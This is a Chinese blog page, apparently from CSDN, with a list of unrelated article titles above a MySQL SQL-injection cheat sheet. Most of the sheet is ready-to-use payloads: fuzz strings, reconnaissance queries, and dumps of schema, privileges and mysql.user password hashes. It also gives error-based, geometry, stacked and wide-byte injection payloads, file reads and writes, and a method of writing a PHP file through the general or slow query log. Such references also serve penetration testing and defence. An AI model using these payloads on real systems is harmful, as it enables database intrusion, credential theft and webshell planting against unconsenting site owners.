- 1基于RK3588的嵌入式linux系统开发(二)——uboot源码移植及编译_rk3588 uboot
- 2一文读懂 Linux mmap 内存映射_mmap申请sram区域
- 3Kafka宝典_kafka from-beginning
- 4Source Tree 图形化工具的使用
- 5❤️对比PyWinAuto和uiautomation实现微信联系人自动采集❤️_pywinauto uiautomator 对比
- 6计算机网络展望报告,计算机网络技术发展历程、功能及展望,毕业论文,课程设计,PPT,开发报告,外文翻译...
- 7Git版本管理软件的安装及使用方法(Sourcetree)_sourcetree 安装
- 8XILINX FPGA底层资源
- 9微信小程序开发实战 ⑤(API及多人协调开发)_微信小程序共同开发
- 10OriginBot智能机器人开源套件—Step4电脑端环境配置
sql注入 mysql 篇 详细使用方式_mysql sql注入命令执行
赞
踩
Fuzz注入点
- ' / "
- ()
- 1/1
- 1/0
- and 1=1
- " and "1"="1
- and 1=2
- or 1=1
- or 1=
- ' and '1'='1
- + - ^ * % /
- << >> || | & &&
- ~
- !
- @(局部变量获取) @@ (全部变量获取)
- ``
信息收集
数据库类型获取
@@innodb_version 获取当前数据库中InnoDB存储引擎的版本号
@@socket socket(默认设置是MySQL)。
@@shared_memory_base_name 共享内存块起一个名字(默认的名字是MySQL)。
@@version 数据库版本
@@version_comment 数据库类型
VERSION()
数据库名
DATABASE()
SCHEMA()
数据库用户名
SESSION_USER() (session用户名)
SYSTEM_USER() (系统用户名)
USER() 当前用户名
数据库服务器绝对地址获取
@@basedir 数据库基础地址
@@character_sets_dir 可用字符集文件的目录名称
@@datadir 默认安装路径
@@general_log_file 日志的存放位置
@@lc_messages_dir 错误信息的存储目录
@@log_error 错误日志文件
@@pid_file 数据进程ID pid文件
@@plugin_dir mysql的插件目录
@@relay_log_basename 中转日志文件的名称和路径
@@relay_log_index 在同一目录
@@slave_load_tmpdir 内存临时表
@@slow_query_log_file MySQL数据库慢查询日志存储路径
@@tmpdir 硬盘上临时表所在的位置
@@language
其他信息获取
@@character_set_database 默认数据库字符集
@@general_log 日志是否开启
@@port 数据库端口
@@version_compile_os 获取操作系统信息
@@version_compile_machine 运行的是64位还是32位
@@hostname 服务器用户名
@@secure_file_priv 为空null mysql是没有写入文件目录权限 不为空会显示可以导入导出的文件地址
connection_id() mysql服务器连接数
mysql last_Insert_id() 返回插入数据第一条的id
FOUND_ROWS() 返回查询的数据数量
count(*) 返回查询的数据数量
row_count() 对于 INSERT、UPDATE、DELETE 查询,可以使用以下语句获取受影响的行数
字段数判断
Order by + 数字 进行判断
union+select+null,null 不断加null进行判断字段
information_schema库查询当前库所有字段对应得表
SELECT group_concat(concat_ws('_______',TABLE_NAME,column_name) SEPARATOR '--|||--') FROM information_schema.`COLUMNS` WHERE table_schema=SCHEMA()
information_schema库进程情况查询
SELECT group_concat(concat_ws('_____',user,host,db,state) SEPARATOR '--|||--') FROM information_schema.processlist
当前数据库账号权限查询
SELECT group_concat(concat_ws('_____',GRANTEE,PRIVILEGE_TYPE,IS_GRANTABLE)) FROM information_schema.user_privileges
所有数据库用户账号查询(需要高权限sqlmap 用的就是这个)
SELECT group_concat(concat_ws('_____',HOST,user,authentication_string)) FROM mysql.user
常规操作函数
exsits () 判断是否存在
Substring() 截取字符 example : substring(username,1,1)
if(1=1,'foo','bar'); return 'foo'
Limit 1,1
Ascii
char() example : SELECT char(0x41) 将ascii码转化为字符串
Ascii() example :select ascii('hi') 将字符串转化为ascii码
Ord() exmaple : select ORD('2') 单字节返回ascii编码
ASCII码 example :SELECT 0x414243 => return ABC
拼接函数
concat()
concat_ws()
group_concat()
延时函数(延时注入)
sleep(1)
BENCHMARK(5000000, MD5('test'))
注释
-- example:SELECT 1 -- comment
# example:SELECT 1 # comment
/**/ example:SELECT /*comment*/1
/*!*/ example: /*!xxx*/
报错注入
8.x>mysql>5.0
select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a
mysql 小于5.1.5中不能用ExtractValue和UpdateXML进行报错注入
Select extractvalue(1, concat(0x5c,(select user())))
Select updatexml(0x3a,concat(1,(select user())),1)
mysql>=5.7
Select ST_LatFromGeoHash((select * from(select * from(select user())a)b))
SELECT ST_PointFromGeoHash(version(),1)
5.5<mysql版本<5.6
Select exp(~(SELECT * from(select user())a))
MySQL >= 5.6.X - 显错<=200
Select GTID_SUBTRACT(version(), 1)
Select GTID_SUBSET(version(), 1)
基于geometric的报错注入
Mysql<5.5.49
GeometryCollection((select * from (select * from(select user())a)b))
polygon((select * from(select * from(select user())a)b))
multipoint((select * from(select * from(select user())a)b))
multilinestring((select * from(select * from(select user())a)b))
LINESTRING((select * from(select * from(select user())a)b))
multipolygon((select * from(select * from(select user())a)b))
堆叠注入
通过在存在注入的语句添加 ; 进行注入
//16进制的select语句 可以绕过select等禁用情况的waf
mysql> SET @s = 0x111;
mysql> PREPARE stmt2 FROM @s;
mysql> EXECUTE stmt2;
宽字节注入
前提 数据库使用编码方式
GBK、GB18030、BIG5、Shift_JIS
通过在'前添加%df编码掉/转义符号
文件读写操作
前提(前面已经给出查看和获取方式)
用户角色有写文件权限
知晓文件绝对路径
写入的路径存在写入权限@@secure_file_priv、
当secure_file_priv为空,就可以读取全部磁盘的文件。
当secure_file_priv为G:\,就可以读取G盘的文件。
当secure_file_priv为null,load_file就不能加载文件
文件读取
Select 1,load_file('C:\\samples\\1.txt'),3
文件写入
SELECT * INTO OUTFILE ‘/path/to/employee.txt’ ( 多行操作)
SELECT * INTO Dumpfile ‘/path/to/employee.txt’ (单行操作)
dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏
基于日志的文件写入
必须拥有super权限
方法一:
Select @@general_log 查看日志是否开启1为开启
Select @@general_log_file 查看日志位置
set global general_log = on;
set global general_log_file = 'D:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\data\\1.php'
select '<?php var_dump("test");?>';
方法二:(mysql慢日志 自己翻数据库全局变量找到的 不知道有没有传开)
Select @@slow_query_log 查看日志是否开启1为开启
Select @@slow_query_log_file 查看日志位置
Select @@long_query_time 查看多久才会记录到慢日志
堆叠注入使用
Set long_query_time=0;(执行零秒就会保存,默认10秒才会保存日志)
set global slow_query_log = on;
set global slow_query_log_file= 'D:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\data\\2.php'
select '<?php var_dump("test");?>';
UDF提权命令执行(此篇过于详细我不重复了)
https://blog.csdn.net/qq_35938621/article/details/119716077
二次注入
数据从数据库中取出来时被我们存入的数据进行了SQL注入
一般需要俩步
存入 然后 取出 且取出使用时那个位置存在sql注点
参考
https://blog.csdn.net/qq_35938621/article/details/119716077
